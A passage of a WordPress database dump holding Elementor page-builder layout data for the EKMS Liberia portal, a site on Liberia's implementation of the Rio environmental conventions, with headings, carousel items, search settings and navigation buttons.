fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_fccc.jpg\",\"id\":1856},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\"},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(13233,2143,'_elementor_version','2.7.5'),(13234,2143,'_elementor_template_type','wp-page'),(13235,2143,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(13237,2144,'_wp_page_template','default'),(13238,2144,'_elementor_edit_mode','builder'),(13239,2144,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(0,0,0,0.14)\"},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"left\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"left\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_type\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[